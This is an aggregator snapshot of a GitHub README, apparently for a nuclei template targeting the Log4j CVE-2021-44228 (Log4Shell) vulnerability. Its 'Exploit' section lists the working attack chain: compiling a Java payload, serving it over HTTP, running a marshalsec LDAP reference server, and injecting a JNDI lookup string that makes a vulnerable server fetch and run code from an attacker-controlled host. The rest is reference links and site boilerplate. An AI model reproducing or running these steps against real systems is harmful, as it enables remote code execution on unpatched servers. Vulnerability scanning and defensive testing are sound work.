9
GitHub - numanturle/Log4jNuclei: Log4j for nuclei
source link: https://github.com/numanturle/Log4jNuclei
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Log4jNuclei
CVE-2021-44228
Log4j for nuclei
Exploit
javac Exploit.java
python3 -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit
insert log ${jndi:ldap://lhost/exploit}
Reference
https://cloud.tencent.com/developer/article/1653754 https://www.freebuf.com/vuls/208339.html
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK